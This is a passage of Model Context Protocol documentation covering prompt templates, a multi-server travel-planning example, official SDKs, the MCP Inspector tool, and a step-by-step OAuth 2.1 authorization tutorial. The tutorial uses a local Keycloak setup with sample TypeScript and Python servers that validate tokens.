* Search and filter interfaces for finding specific resources
* Automatic context inclusion or smart suggestions based on heuristics or AI selection
* Manual or bulk selection interfaces for including single or multiple resources
Applications are free to implement resource discovery through any interface pattern that suits their needs. The protocol doesn't mandate specific UI patterns, allowing for resource pickers with preview capabilities, smart suggestions based on current conversation context, bulk selection for including multiple resources, or integration with existing file browsers and data explorers.
### Prompts
Prompts provide reusable templates. They allow MCP server authors to provide parameterized prompts for a domain, or showcase how to best use the MCP server.
#### How Prompts Work
Prompts are structured templates that define expected inputs and interaction patterns. They are user-controlled, requiring explicit invocation rather than automatic triggering. Prompts can be context-aware, referencing available resources and tools to create comprehensive workflows. Similar to resources, prompts support parameter completion to help users discover valid argument values.
**Protocol operations:**
| Method | Purpose | Returns |
| -------------- | -------------------------- | ------------------------------------- |
| `prompts/list` | Discover available prompts | Array of prompt descriptors |
| `prompts/get` | Retrieve prompt details | Full prompt definition with arguments |
#### Example: Streamlined Workflows
Prompts provide structured templates for common tasks. In the travel planning context:
**"Plan a vacation" prompt:**
```json theme={null}
{
"name": "plan-vacation",
"title": "Plan a vacation",
"description": "Guide through vacation planning process",
"arguments": [
{ "name": "destination", "type": "string", "required": true },
{ "name": "duration", "type": "number", "description": "days" },
{ "name": "budget", "type": "number", "required": false },
{ "name": "interests", "type": "array", "items": { "type": "string" } }
]
}
```
Rather than unstructured natural language input, the prompt system enables:
1. Selection of the "Plan a vacation" template
2. Structured input: Barcelona, 7 days, \$3000, \["beaches", "architecture", "food"]
3. Consistent workflow execution based on the template
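Once the user submits those values, the application retrieves the expanded template with `prompts/get`. Note that argument values travel as strings; the message text below is illustrative:

```typescript theme={null}
// Illustrative prompts/get request
{
  method: "prompts/get",
  params: {
    name: "plan-vacation",
    arguments: { destination: "Barcelona", duration: "7", budget: "3000" }
  }
}

// Illustrative result: ready-to-use messages for the model
{
  description: "Guide through vacation planning process",
  messages: [
    {
      role: "user",
      content: {
        type: "text",
        text: "Plan a 7-day vacation to Barcelona with a $3000 budget. Interests: beaches, architecture, food."
      }
    }
  ]
}
```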
#### User Interaction Model
Prompts are user-controlled, requiring explicit invocation. The protocol gives implementers freedom to design interfaces that feel natural within their application. Key principles include:
* Easy discovery of available prompts
* Clear descriptions of what each prompt does
* Natural argument input with validation
* Transparent display of the prompt's underlying template
Applications typically expose prompts through various UI patterns such as:
* Slash commands (typing "/" to see available prompts like /plan-vacation)
* Command palettes for searchable access
* Dedicated UI buttons for frequently used prompts
* Context menus that suggest relevant prompts
## Bringing Servers Together
The real power of MCP emerges when multiple servers work together, combining their specialized capabilities through a unified interface.
### Example: Multi-Server Travel Planning
Consider a personalized AI travel planner application, with three connected servers:
* **Travel Server** - Handles flights, hotels, and itineraries
* **Weather Server** - Provides climate data and forecasts
* **Calendar/Email Server** - Manages schedules and communications
#### The Complete Flow
1. **User invokes a prompt with parameters:**
```json theme={null}
{
"prompt": "plan-vacation",
"arguments": {
"destination": "Barcelona",
"departure_date": "2024-06-15",
"return_date": "2024-06-22",
"budget": 3000,
"travelers": 2
}
}
```
2. **User selects resources to include:**
* `calendar://my-calendar/June-2024` (from Calendar Server)
* `travel://preferences/europe` (from Travel Server)
* `travel://past-trips/Spain-2023` (from Travel Server)
3. **AI processes the request using tools:**
The AI first reads all selected resources to gather context - identifying available dates from the calendar, learning preferred airlines and hotel types from travel preferences, and discovering previously enjoyed locations from past trips.
Using this context, the AI then executes a series of Tools:
* `searchFlights()` - Queries airlines for NYC to Barcelona flights
* `checkWeather()` - Retrieves climate forecasts for travel dates
The AI then uses this information to create the booking and following steps, requesting approval from the user where necessary:
* `bookHotel()` - Finds hotels within the specified budget
* `createCalendarEvent()` - Adds the trip to the user's calendar
* `sendEmail()` - Sends confirmation with trip details
**The result:** Through multiple MCP servers, the user researched and booked a Barcelona trip tailored to their schedule. The "Plan a Vacation" prompt guided the AI to combine Resources (calendar availability and travel history) with Tools (searching flights, booking hotels, updating calendars) across different servers—gathering context and executing the booking. A task that could have taken hours was completed in minutes using MCP.
# SDKs
Source: https://modelcontextprotocol.io/docs/sdk
Official SDKs for building with Model Context Protocol
Build MCP servers and clients using our official SDKs. SDKs are classified into tiers based on feature completeness, protocol support, and maintenance commitment. Learn more about [SDK tiers](/community/sdk-tiers).
## Available SDKs
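Official SDKs are currently available for languages including TypeScript, Python, Java, Kotlin, C#, Go, Ruby, Rust, Swift, and PHP; see the individual SDK pages for each one's tier and maintenance status.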
## Getting Started
Each SDK provides the same functionality but follows the idioms and best practices of its language. All SDKs support:
* Creating MCP servers that expose tools, resources, and prompts
* Building MCP clients that can connect to any MCP server
* Local and remote transport protocols
* Protocol compliance with type safety
Visit the SDK page for your chosen language to find installation instructions, documentation, and examples.
## Next Steps
Ready to start building with MCP? Choose your path:
* [Build an MCP server](/docs/develop/build-server) - Learn how to create your first MCP server
* [Build an MCP client](/docs/develop/build-client) - Create applications that connect to MCP servers
# MCP Inspector
Source: https://modelcontextprotocol.io/docs/tools/inspector
In-depth guide to using the MCP Inspector for testing and debugging Model Context Protocol servers
The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is an interactive developer tool for testing and debugging MCP servers. While the [Debugging Guide](/legacy/tools/debugging) covers the Inspector as part of the overall debugging toolkit, this document provides a detailed exploration of the Inspector's features and capabilities.
## Getting started
### Installation and basic usage
The Inspector runs directly through `npx` without requiring installation:
```bash theme={null}
npx @modelcontextprotocol/inspector
```
#### Inspecting servers from npm or PyPI
A common way to inspect server packages is to start them directly from [npm](https://npmjs.com) or [PyPI](https://pypi.org):
```bash theme={null}
npx -y @modelcontextprotocol/inspector npx
# For example
npx -y @modelcontextprotocol/inspector npx @modelcontextprotocol/server-filesystem /Users/username/Desktop
```
```bash theme={null}
npx @modelcontextprotocol/inspector uvx
# For example
npx @modelcontextprotocol/inspector uvx mcp-server-git --repository ~/code/mcp/servers.git
```
#### Inspecting locally developed servers
To inspect a server you are developing locally or have downloaded as a repository, the most common approach is:
```bash theme={null}
npx @modelcontextprotocol/inspector node path/to/server/index.js args...
```
```bash theme={null}
npx @modelcontextprotocol/inspector \
uv \
--directory path/to/server \
run \
package-name \
args...
```
Please carefully read any attached README for the most accurate instructions.
## Feature overview
The Inspector provides several features for interacting with your MCP server:
### Server connection pane
* Allows selecting the [transport](/legacy/concepts/transports) for connecting to the server
* For local servers, supports customizing the command-line arguments and environment
### Resources tab
* Lists all available resources
* Shows resource metadata (MIME types, descriptions)
* Allows resource content inspection
* Supports subscription testing
### Prompts tab
* Displays available prompt templates
* Shows prompt arguments and descriptions
* Enables prompt testing with custom arguments
* Previews generated messages
### Tools tab
* Lists available tools
* Shows tool schemas and descriptions
* Enables tool testing with custom inputs
* Displays tool execution results
### Notifications pane
* Presents all logs recorded from the server
* Shows notifications received from the server
## Best practices
### Development workflow
1. Start development
* Launch Inspector with your server
* Verify basic connectivity
* Check capability negotiation
2. Iterative testing
* Make server changes
* Rebuild the server
* Reconnect the Inspector
* Test affected features
* Monitor messages
3. Test edge cases
* Invalid inputs
* Missing prompt arguments
* Concurrent operations
* Verify error handling and error responses
## Next steps
* [MCP Inspector repository](https://github.com/modelcontextprotocol/inspector) - Check out the MCP Inspector source code
* [Debugging Guide](/legacy/tools/debugging) - Learn about broader debugging strategies
# Understanding Authorization in MCP
Source: https://modelcontextprotocol.io/docs/tutorials/security/authorization
Learn how to implement secure authorization for MCP servers using OAuth 2.1 to protect sensitive resources and operations
Authorization in the Model Context Protocol (MCP) secures access to sensitive resources and operations exposed by MCP servers. If your MCP server handles user data or administrative actions, authorization ensures only permitted users can access its endpoints.
MCP uses standardized authorization flows to build trust between MCP clients and MCP servers. Its design doesn't focus on one specific authorization or identity system, but rather follows the conventions outlined in [OAuth 2.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13). For detailed information, see the [Authorization specification](/specification/latest/basic/authorization).
## When Should You Use Authorization?
While authorization for MCP servers is **optional**, it is strongly recommended when:
* Your server accesses user-specific data (emails, documents, databases)
* You need to audit who performed which actions
* Your server grants access to its APIs that require user consent
* You're building for enterprise environments with strict access controls
* You want to implement rate limiting or usage tracking per user
**Authorization for Local MCP Servers**
For MCP servers using the [STDIO transport](/specification/latest/basic/transports#stdio), you can instead use environment-based credentials or credentials provided by third-party libraries embedded directly in the MCP server. Because a STDIO-based MCP server runs locally, it has a range of flexible options for acquiring user credentials that may or may not rely on in-browser authentication and authorization flows.
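As a minimal sketch, a local STDIO server might read a service credential from its environment at startup; the variable name here is hypothetical:

```typescript theme={null}
// Hypothetical sketch: a local stdio server reading a credential from its environment
const apiToken = process.env.TRAVEL_API_TOKEN; // injected via the host's server configuration
if (!apiToken) {
  throw new Error("TRAVEL_API_TOKEN is not set; add it to the server's env configuration");
}
```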
OAuth flows, in turn, are designed for HTTP-based transports where the MCP server is remotely hosted and the client uses OAuth to establish that a user is authorized to access that remote server.
## The Authorization Flow: Step by Step
Let's walk through what happens when a client wants to connect to your protected MCP server:
When your MCP client first tries to connect, your server responds with a `401 Unauthorized` and tells the client where to find authorization information, captured in a [Protected Resource Metadata (PRM) document](https://datatracker.ietf.org/doc/html/rfc9728). The document is hosted by the MCP server, follows a predictable path pattern, and is provided to the client in the `resource_metadata` parameter within the `WWW-Authenticate` header.
```http theme={null}
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer realm="mcp",
resource_metadata="https://your-server.com/.well-known/oauth-protected-resource"
```
This tells the client that authorization is required for the MCP server and where to get the necessary information to kickstart the authorization flow.
With the URI pointer to the PRM document, the client will fetch the metadata to learn about the authorization server, supported scopes, and other resource information. The data is typically encapsulated in a JSON blob, similar to the one below.
```json theme={null}
{
"resource": "https://your-server.com/mcp",
"authorization_servers": ["https://auth.your-server.com"],
"scopes_supported": ["mcp:tools", "mcp:resources"]
}
```
You can see a more comprehensive example in [RFC 9728 Section 3.2](https://datatracker.ietf.org/doc/html/rfc9728#name-protected-resource-metadata-r).
Next, the client discovers what the authorization server can do by fetching its metadata. If the PRM document lists more than one authorization server, the client can decide which one to use.
With an authorization server selected, the client constructs a standard metadata URI and issues a request to the [OpenID Connect (OIDC) Discovery](https://openid.net/specs/openid-connect-discovery-1_0.html) or [OAuth 2.0 Authorization Server Metadata](https://datatracker.ietf.org/doc/html/rfc8414) endpoint (depending on what the authorization server supports), retrieving another set of metadata properties that tell it which endpoints it needs to complete the authorization flow.
```json theme={null}
{
"issuer": "https://auth.your-server.com",
"authorization_endpoint": "https://auth.your-server.com/authorize",
"token_endpoint": "https://auth.your-server.com/token",
"registration_endpoint": "https://auth.your-server.com/register"
}
```
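Taken together, these two discovery steps amount to a pair of metadata fetches. A minimal client-side sketch, assuming the example URLs above and OAuth 2.0 Authorization Server Metadata support:

```typescript theme={null}
// Sketch of client-side discovery using the example URLs above
const prm = await fetch(
  "https://your-server.com/.well-known/oauth-protected-resource",
).then((r) => r.json());

// Pick an authorization server and fetch its metadata (RFC 8414 path shown)
const issuer: string = prm.authorization_servers[0];
const asMetadata = await fetch(
  new URL("/.well-known/oauth-authorization-server", issuer),
).then((r) => r.json());

console.log(asMetadata.authorization_endpoint, asMetadata.token_endpoint);
```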
With metadata discovery complete, the client now needs to make sure that it's registered with the authorization server. This can be done in two ways.
First, the client can be **pre-registered** with a given authorization server, in which case it can have embedded client registration information that it uses to complete the authorization flow.
Alternatively, the client can use **Dynamic Client Registration** (DCR) to register itself with the authorization server dynamically. This requires the authorization server to support DCR; if it does, the client sends a request to the `registration_endpoint` with its information:
```json theme={null}
{
"client_name": "My MCP Client",
"redirect_uris": ["http://localhost:3000/callback"],
"grant_types": ["authorization_code", "refresh_token"],
"response_types": ["code"]
}
```
If the registration succeeds, the authorization server will return a JSON blob with client registration information.
**No DCR or Pre-Registration**
In case an MCP client connects to an MCP server that doesn't use an authorization server that supports DCR and the client is not pre-registered with said authorization server, it's the responsibility of the client developer to provide an affordance for the end-user to enter client information manually.
The client will now need to open a browser to the `/authorize` endpoint, where the user can log in and grant the required permissions. The authorization server will then redirect back to the client with an authorization code that the client exchanges for tokens:
```json theme={null}
{
"access_token": "eyJhbGciOiJSUzI1NiIs...",
"refresh_token": "def502...",
"token_type": "Bearer",
"expires_in": 3600
}
```
The access token is what the client will use to authenticate requests to the MCP server. This step follows standard [OAuth 2.1 authorization code with PKCE](https://oauth.net/2/grant-types/authorization-code/) conventions.
Finally, the client can make requests to your MCP server using the access token embedded in the `Authorization` header:
```http theme={null}
GET /mcp HTTP/1.1
Host: your-server.com
Authorization: Bearer eyJhbGciOiJSUzI1NiIs...
```
The MCP server must validate the token, and only process the request if the token is valid and carries the required permissions.
## Implementation Example
To get started with a practical implementation, we will use a [Keycloak](https://www.keycloak.org/) authorization server hosted in a Docker container. Keycloak is an open-source authorization server that can be easily deployed locally for testing and experimentation.
Make sure that you download and install [Docker Desktop](https://www.docker.com/products/docker-desktop/). We will need it to deploy Keycloak on our development machine.
### Keycloak Setup
From your terminal application, run the following command to start the Keycloak container:
```bash theme={null}
docker run -p 127.0.0.1:8080:8080 -e KC_BOOTSTRAP_ADMIN_USERNAME=admin -e KC_BOOTSTRAP_ADMIN_PASSWORD=admin quay.io/keycloak/keycloak start-dev
```
This command will pull the Keycloak container image locally and bootstrap the basic configuration. Keycloak will run on port `8080` with an `admin` user whose password is `admin`.
**Not for Production**
The configuration above may be suitable for testing and experimentation; however, you should never use it in production. Refer to the [Configuring Keycloak for production](https://www.keycloak.org/server/configuration-production) guide for additional details on how to deploy the authorization server for scenarios that require reliability, security, and high availability.
You will be able to access the Keycloak authorization server from your browser at `http://localhost:8080`.
When running with the default configuration, Keycloak will already support many of the capabilities that we need for MCP servers, including Dynamic Client Registration. You can check this by looking at the OIDC configuration, available at:
```http theme={null}
http://localhost:8080/realms/master/.well-known/openid-configuration
```
We will also need to set up Keycloak to support our scopes and allow our host (local machine) to dynamically register clients, as the default policies restrict anonymous dynamic client registration.
Go to **Client scopes** in the Keycloak dashboard and create a new `mcp:tools` scope. We will use this to access all of the tools on our MCP server.
After creating the scope, set its type to **Default** and enable the **Include in token scope** switch, as this will be needed for token validation.
Let's now also set up an **audience** for our Keycloak-issued tokens. An audience is important to configure because it embeds the intended destination directly into the issued access token. This helps your MCP server to verify that the token it got was actually meant for it rather than some other API. This is key to help avoid token passthrough scenarios.
To do this, open your `mcp:tools` client scope and click on **Mappers**, followed by **Configure a new mapper**. Select **Audience**.
For **Name**, use `audience-config`. Add a value for **Included Custom Audience**, set to `http://localhost:3000`. This will be the URI of our test server.
**Not for Production**
The audience configuration above is meant for testing. For production scenarios, additional setup and configuration is required to ensure that audiences are properly constrained for issued tokens. Specifically, the audience needs to be based on the `resource` parameter passed from the client, not a fixed value.
Now, navigate to **Clients**, then **Client registration**, and then **Trusted Hosts**. Disable the **Client URIs Must Match** setting and add the hosts from which you're testing. You can find your current host IP by running `ifconfig` on Linux or macOS, or `ipconfig` on Windows. Alternatively, look in the Keycloak logs for a line like `Failed to verify remote host : 192.168.215.1` to see which IP address you need to add. Check that the IP address is associated with your host; depending on your Docker setup, it may belong to a bridge network.
**Getting the Host**
If you are running Keycloak from a container, you will also be able to see the host IP from the Terminal in the container logs.
Lastly, we need to register a new client that we can use with the **MCP server itself** to talk to Keycloak for things like [token introspection](https://oauth.net/2/token-introspection/). To do that:
1. Go to **Clients**.
2. Click **Create client**.
3. Give your client a unique **Client ID** and click **Next**.
4. Enable **Client authentication** and click **Next**.
5. Click **Save**.
It's worth noting that token introspection is just *one of* the available approaches to validating tokens. Validation can also be done with standalone libraries specific to each language and platform.
When you open the client details, go to **Credentials** and take note of the **Client Secret**.
**Handling Secrets**
Never embed client credentials directly in your code. We recommend using environment variables or specialized solutions for secret storage.
With Keycloak configured, every time the authorization flow is triggered, your MCP server will receive a token like this:
```text theme={null}
eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI1TjcxMGw1WW5MWk13WGZ1VlJKWGtCS3ZZMzZzb3JnRG5scmlyZ2tlTHlzIn0.eyJleHAiOjE3NTU1NDA4MTcsImlhdCI6MTc1NTU0MDc1NywiYXV0aF90aW1lIjoxNzU1NTM4ODg4LCJqdGkiOiJvbnJ0YWM6YjM0MDgwZmYtODQwNC02ODY3LTgxYmUtMTIzMWI1MDU5M2E4IiwiaXNzIjoiaHR0cDovL2xvY2FsaG9zdDo4MDgwL3JlYWxtcy9tYXN0ZXIiLCJhdWQiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAiLCJzdWIiOiIzM2VkNmM2Yi1jNmUwLTQ5MjgtYTE2MS1mMmY2OWM3YTAzYjkiLCJ0eXAiOiJCZWFyZXIiLCJhenAiOiI3OTc1YTViNi04YjU5LTRhODUtOWNiYS04ZmFlYmRhYjg5NzQiLCJzaWQiOiI4ZjdlYzI3Ni0zNThmLTRjY2MtYjMxMy1kYjA4MjkwZjM3NmYiLCJzY29wZSI6Im1jcDp0b29scyJ9.P5xCRtXORly0R0EXjyqRCUx-z3J4uAOWNAvYtLPXroykZuVCCJ-K1haiQSwbURqfsVOMbL7jiV-sD6miuPzI1tmKOkN_Yct0Vp-azvj7U5rEj7U6tvPfMkg2Uj_jrIX0KOskyU2pVvGZ-5BgqaSvwTEdsGu_V3_E0xDuSBq2uj_wmhqiyTFm5lJ1WkM3Hnxxx1_AAnTj7iOKMFZ4VCwMmk8hhSC7clnDauORc0sutxiJuYUZzxNiNPkmNeQtMCGqWdP1igcbWbrfnNXhJ6NswBOuRbh97_QraET3hl-CNmyS6C72Xc0aOwR_uJ7xVSBTD02OaQ1JA6kjCATz30kGYg
```
Decoded, it will look like this:
```json theme={null}
{
"alg": "RS256",
"typ": "JWT",
"kid": "5N710l5YnLZMwXfuVRJXkBKvY36sorgDnlrirgkeLys"
}.{
"exp": 1755540817,
"iat": 1755540757,
"auth_time": 1755538888,
"jti": "onrtac:b34080ff-8404-6867-81be-1231b50593a8",
"iss": "http://localhost:8080/realms/master",
"aud": "http://localhost:3000",
"sub": "33ed6c6b-c6e0-4928-a161-f2f69c7a03b9",
"typ": "Bearer",
"azp": "7975a5b6-8b59-4a85-9cba-8faebdab8974",
"sid": "8f7ec276-358f-4ccc-b313-db08290f376f",
"scope": "mcp:tools"
}.[Signature]
```
**Embedded Audience**
Notice the `aud` claim embedded in the token: it is set to the URI of the test MCP server, derived from the audience mapper we attached to the `mcp:tools` scope. Validating this claim will be an important part of our implementation.
### MCP Server Setup
We will now set up our MCP server to use the locally-running Keycloak authorization server. Depending on your programming language preference, you can use one of the supported [MCP SDKs](/docs/sdk).
For our testing purposes, we will create an extremely simple MCP server that exposes two tools - one for addition and another for multiplication. The server will require authorization to access these.
You can see the complete TypeScript project in the [sample repository](https://github.com/localden/min-ts-mcp-auth).
Prior to running the code below, ensure that you have a `.env` file with the following content:
```env theme={null}
# Server host/port
HOST=localhost
PORT=3000
# Auth server location
AUTH_HOST=localhost
AUTH_PORT=8080
AUTH_REALM=master
# Keycloak OAuth client credentials
OAUTH_CLIENT_ID=
OAUTH_CLIENT_SECRET=
```
`OAUTH_CLIENT_ID` and `OAUTH_CLIENT_SECRET` are associated with the MCP server client we created earlier.
In addition to implementing the MCP authorization specification, the server below also does token introspection via Keycloak to make sure that the token it receives from the client is valid. It also implements basic logging to allow you to easily diagnose any issues.
```typescript theme={null}
import "dotenv/config";
import express from "express";
import { randomUUID } from "node:crypto";
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js";
import { isInitializeRequest } from "@modelcontextprotocol/sdk/types.js";
import { z } from "zod";
import cors from "cors";
import {
mcpAuthMetadataRouter,
getOAuthProtectedResourceMetadataUrl,
} from "@modelcontextprotocol/sdk/server/auth/router.js";
import { requireBearerAuth } from "@modelcontextprotocol/sdk/server/auth/middleware/bearerAuth.js";
import { OAuthMetadata } from "@modelcontextprotocol/sdk/shared/auth.js";
import { checkResourceAllowed } from "@modelcontextprotocol/sdk/shared/auth-utils.js";
const CONFIG = {
host: process.env.HOST || "localhost",
port: Number(process.env.PORT) || 3000,
auth: {
host: process.env.AUTH_HOST || process.env.HOST || "localhost",
port: Number(process.env.AUTH_PORT) || 8080,
realm: process.env.AUTH_REALM || "master",
clientId: process.env.OAUTH_CLIENT_ID || "mcp-server",
clientSecret: process.env.OAUTH_CLIENT_SECRET || "",
},
};
function createOAuthUrls() {
const authBaseUrl = new URL(
`http://${CONFIG.auth.host}:${CONFIG.auth.port}/realms/${CONFIG.auth.realm}/`,
);
return {
issuer: authBaseUrl.toString(),
introspection_endpoint: new URL(
"protocol/openid-connect/token/introspect",
authBaseUrl,
).toString(),
authorization_endpoint: new URL(
"protocol/openid-connect/auth",
authBaseUrl,
).toString(),
token_endpoint: new URL(
"protocol/openid-connect/token",
authBaseUrl,
).toString(),
};
}
function createRequestLogger() {
return (req: any, res: any, next: any) => {
const start = Date.now();
res.on("finish", () => {
const ms = Date.now() - start;
console.log(
`${req.method} ${req.originalUrl} -> ${res.statusCode} ${ms}ms`,
);
});
next();
};
}
const app = express();
app.use(
express.json({
verify: (req: any, _res, buf) => {
req.rawBody = buf?.toString() ?? "";
},
}),
);
app.use(
cors({
origin: "*",
exposedHeaders: ["Mcp-Session-Id"],
}),
);
app.use(createRequestLogger());
const mcpServerUrl = new URL(`http://${CONFIG.host}:${CONFIG.port}`);
const oauthUrls = createOAuthUrls();
const oauthMetadata: OAuthMetadata = {
...oauthUrls,
response_types_supported: ["code"],
};
const tokenVerifier = {
verifyAccessToken: async (token: string) => {
const endpoint = oauthMetadata.introspection_endpoint;
if (!endpoint) {
console.error("[auth] no introspection endpoint in metadata");
throw new Error("No token verification endpoint available in metadata");
}
const params = new URLSearchParams({
token: token,
client_id: CONFIG.auth.clientId,
});
if (CONFIG.auth.clientSecret) {
params.set("client_secret", CONFIG.auth.clientSecret);
}
let response: Response;
try {
response = await fetch(endpoint, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: params.toString(),
});
} catch (e) {
console.error("[auth] introspection fetch threw", e);
throw e;
}
if (!response.ok) {
const txt = await response.text();
console.error("[auth] introspection non-OK", { status: response.status });
try {
const obj = JSON.parse(txt);
console.log(JSON.stringify(obj, null, 2));
} catch {
console.error(txt);
}
throw new Error(`Invalid or expired token: ${txt}`);
}
    // Read the body once as text, then parse, so a parse failure can still log the raw body
    const rawBody = await response.text();
    let data: any;
    try {
      data = JSON.parse(rawBody);
    } catch (e) {
      console.error("[auth] failed to parse introspection JSON", {
        error: String(e),
        body: rawBody,
      });
      throw e;
    }
if (data.active === false) {
throw new Error("Inactive token");
}
if (!data.aud) {
throw new Error("Resource indicator (aud) missing");
}
const audiences: string[] = Array.isArray(data.aud) ? data.aud : [data.aud];
const allowed = audiences.some((a) =>
checkResourceAllowed({
requestedResource: a,
configuredResource: mcpServerUrl,
}),
);
if (!allowed) {
throw new Error(
`None of the provided audiences are allowed. Expected ${mcpServerUrl}, got: ${audiences.join(", ")}`,
);
}
return {
token,
clientId: data.client_id,
scopes: data.scope ? data.scope.split(" ") : [],
expiresAt: data.exp,
};
},
};
app.use(
mcpAuthMetadataRouter({
oauthMetadata,
resourceServerUrl: mcpServerUrl,
scopesSupported: ["mcp:tools"],
resourceName: "MCP Demo Server",
}),
);
const authMiddleware = requireBearerAuth({
verifier: tokenVerifier,
requiredScopes: [],
resourceMetadataUrl: getOAuthProtectedResourceMetadataUrl(mcpServerUrl),
});
const transports: { [sessionId: string]: StreamableHTTPServerTransport } = {};
function createMcpServer() {
const server = new McpServer({
name: "example-server",
version: "1.0.0",
});
server.registerTool(
"add",
{
title: "Addition Tool",
description: "Add two numbers together",
inputSchema: {
a: z.number().describe("First number to add"),
b: z.number().describe("Second number to add"),
},
},
async ({ a, b }) => ({
content: [{ type: "text", text: `${a} + ${b} = ${a + b}` }],
}),
);
server.registerTool(
"multiply",
{
title: "Multiplication Tool",
description: "Multiply two numbers together",
inputSchema: {
x: z.number().describe("First number to multiply"),
y: z.number().describe("Second number to multiply"),
},
},
async ({ x, y }) => ({
content: [{ type: "text", text: `${x} × ${y} = ${x * y}` }],
}),
);
return server;
}
const mcpPostHandler = async (req: express.Request, res: express.Response) => {
const sessionId = req.headers["mcp-session-id"] as string | undefined;
let transport: StreamableHTTPServerTransport;
if (sessionId && transports[sessionId]) {
transport = transports[sessionId];
} else if (!sessionId && isInitializeRequest(req.body)) {
transport = new StreamableHTTPServerTransport({
sessionIdGenerator: () => randomUUID(),
onsessioninitialized: (sessionId) => {
transports[sessionId] = transport;
},
});
transport.onclose = () => {
if (transport.sessionId) {
delete transports[transport.sessionId];
}
};
const server = createMcpServer();
await server.connect(transport);
} else {
res.status(400).json({
jsonrpc: "2.0",
error: {
code: -32000,
message: "Bad Request: No valid session ID provided",
},
id: null,
});
return;
}
await transport.handleRequest(req, res, req.body);
};
const handleSessionRequest = async (
req: express.Request,
res: express.Response,
) => {
const sessionId = req.headers["mcp-session-id"] as string | undefined;
if (!sessionId || !transports[sessionId]) {
res.status(400).send("Invalid or missing session ID");
return;
}
const transport = transports[sessionId];
await transport.handleRequest(req, res);
};
app.post("/", authMiddleware, mcpPostHandler);
app.get("/", authMiddleware, handleSessionRequest);
app.delete("/", authMiddleware, handleSessionRequest);
app.listen(CONFIG.port, CONFIG.host, () => {
console.log(`🚀 MCP Server running on ${mcpServerUrl.origin}`);
console.log(`📡 MCP endpoint available at ${mcpServerUrl.origin}`);
console.log(
`🔐 OAuth metadata available at ${getOAuthProtectedResourceMetadataUrl(mcpServerUrl)}`,
);
});
```
When you run the server, you can add it to your MCP client, such as Visual Studio Code, by providing the MCP server endpoint.
For more details about implementing MCP servers in TypeScript, refer to the [TypeScript SDK documentation](https://github.com/modelcontextprotocol/typescript-sdk).
You can see the complete Python project in the [sample repository](https://github.com/localden/min-py-mcp-auth).
To simplify the authorization interaction in Python scenarios, we rely on [FastMCP](https://gofastmcp.com/getting-started/welcome). Many of the conventions around authorization, like the endpoints and token validation logic, are consistent across languages, but some SDKs offer simpler ways of integrating them in production scenarios.
Prior to writing the actual server, we need to set up our configuration in `config.py` - the contents are entirely based on your local server setup:
```python theme={null}
"""Configuration settings for the MCP auth server."""
import os
class Config:
"""Configuration class that loads from environment variables with sensible defaults."""
# Server settings
HOST: str = os.getenv("HOST", "localhost")
PORT: int = int(os.getenv("PORT", "3000"))
# Auth server settings
AUTH_HOST: str = os.getenv("AUTH_HOST", "localhost")
AUTH_PORT: int = int(os.getenv("AUTH_PORT", "8080"))
AUTH_REALM: str = os.getenv("AUTH_REALM", "master")
# OAuth client settings
OAUTH_CLIENT_ID: str = os.getenv("OAUTH_CLIENT_ID", "mcp-server")
    OAUTH_CLIENT_SECRET: str = os.getenv("OAUTH_CLIENT_SECRET", "")  # supply via environment; never hardcode secrets
# Server settings
MCP_SCOPE: str = os.getenv("MCP_SCOPE", "mcp:tools")
OAUTH_STRICT: bool = os.getenv("OAUTH_STRICT", "false").lower() in ("true", "1", "yes")
TRANSPORT: str = os.getenv("TRANSPORT", "streamable-http")
@property
def server_url(self) -> str:
"""Build the server URL."""
return f"http://{self.HOST}:{self.PORT}"
@property
def auth_base_url(self) -> str:
"""Build the auth server base URL."""
return f"http://{self.AUTH_HOST}:{self.AUTH_PORT}/realms/{self.AUTH_REALM}/"
def validate(self) -> None:
"""Validate configuration."""
if self.TRANSPORT not in ["sse", "streamable-http"]:
raise ValueError(f"Invalid transport: {self.TRANSPORT}. Must be 'sse' or 'streamable-http'")
# Global configuration instance
config = Config()
```
The server implementation is as follows:
```python theme={null}
import datetime
import logging
from typing import Any
from pydantic import AnyHttpUrl
from mcp.server.auth.settings import AuthSettings
from mcp.server.fastmcp.server import FastMCP
from .config import config
from .token_verifier import IntrospectionTokenVerifier
logger = logging.getLogger(__name__)
def create_oauth_urls() -> dict[str, str]:
"""Create OAuth URLs based on configuration (Keycloak-style)."""
from urllib.parse import urljoin
auth_base_url = config.auth_base_url
return {
"issuer": auth_base_url,
"introspection_endpoint": urljoin(auth_base_url, "protocol/openid-connect/token/introspect"),
"authorization_endpoint": urljoin(auth_base_url, "protocol/openid-connect/auth"),
"token_endpoint": urljoin(auth_base_url, "protocol/openid-connect/token"),
}
def create_server() -> FastMCP:
"""Create and configure the FastMCP server."""
config.validate()
oauth_urls = create_oauth_urls()
token_verifier = IntrospectionTokenVerifier(
introspection_endpoint=oauth_urls["introspection_endpoint"],
server_url=config.server_url,
client_id=config.OAUTH_CLIENT_ID,
client_secret=config.OAUTH_CLIENT_SECRET,
)
app = FastMCP(
name="MCP Resource Server",
instructions="Resource Server that validates tokens via Authorization Server introspection",
host=config.HOST,
port=config.PORT,
debug=True,
streamable_http_path="/",
token_verifier=token_verifier,
auth=AuthSettings(
issuer_url=AnyHttpUrl(oauth_urls["issuer"]),
required_scopes=[config.MCP_SCOPE],
resource_server_url=AnyHttpUrl(config.server_url),
),
)
@app.tool()
async def add_numbers(a: float, b: float) -> dict[str, Any]:
"""
Add two numbers together.
This tool demonstrates basic arithmetic operations with OAuth authentication.
Args:
a: The first number to add
b: The second number to add
"""
result = a + b
return {
"operation": "addition",
"operand_a": a,
"operand_b": b,
"result": result,
"timestamp": datetime.datetime.now().isoformat()
}
@app.tool()
async def multiply_numbers(x: float, y: float) -> dict[str, Any]:
"""
Multiply two numbers together.
This tool demonstrates basic arithmetic operations with OAuth authentication.
Args:
x: The first number to multiply
y: The second number to multiply
"""
result = x * y
return {
"operation": "multiplication",
"operand_x": x,
"operand_y": y,
"result": result,
"timestamp": datetime.datetime.now().isoformat()
}
return app
def main() -> int:
"""
Run the MCP Resource Server.
This server:
- Provides RFC 9728 Protected Resource Metadata
- Validates tokens via Authorization Server introspection
